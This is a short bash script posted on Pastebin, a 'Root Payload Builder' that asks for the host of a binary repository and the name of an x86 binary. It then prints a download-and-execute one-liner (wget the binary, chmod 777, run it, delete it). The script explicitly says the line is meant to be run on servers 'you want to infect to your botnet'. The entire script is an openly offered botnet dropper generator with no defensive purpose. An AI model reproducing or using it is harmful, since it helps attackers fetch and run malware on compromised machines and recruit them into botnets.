Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #! /bin/bash
- # chmod +x Root.sh
- # ./Root.sh
- ORANGE=$'\e[38;5;214m'
- RED=$'\e[31m'
- NORMAL="\e[0m"
- clear
- echo -e "${RED}[${ORANGE}Root Payload Builder by Mars The Web Surfer${RED}]\n"
- read -p "${ORANGE}What is the IP/domain of your binary repository${RED}?:${ORANGE} " REPOSITORY
- read -p "${ORANGE}Do you have a directory for your binaries${RED}? (${ORANGE}Y${RED}/${ORANGE}N${RED}):${ORANGE} " ANSWER
- case "$ANSWER" in
- [yY])
- read -p "${ORANGE}What is the name of your binaries directory${RED}?:${ORANGE} " DIRECTORY
- read -p "${ORANGE}What is the name of your X86 binary${RED}?:${ORANGE} " BINARY
- echo ""
- echo -e "${ORANGE}Your root payload${RED}:${ORANGE} wget http://${REPOSITORY}/${DIRECTORY}/${BINARY}; chmod 777 ${BINARY}; ./${BINARY}; rm ${BINARY}"
- echo -e "Save your root payload and run it on the server you want to infect to your botnet${RED}.${NORMAL}"
- ;;
- [nN])
- read -p "${ORANGE}What is the name of your X86 binary${RED}?:${ORANGE} " BINARY
- echo ""
- echo -e "${ORANGE}Your root payload${RED}:${ORANGE} wget http://${REPOSITORY}/${BINARY}; chmod 777 ${BINARY}; ./${BINARY}; rm ${BINARY}"
- echo -e "Save your root payload and run it on the server you want to infect to your botnet${RED}.${NORMAL}"
- ;;
- *)
- echo -e "${ORANGE}Error${RED}:${ORANGE} invalid answer${RED}.${NORMAL}"
- exit 1
- ;;
- esac
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement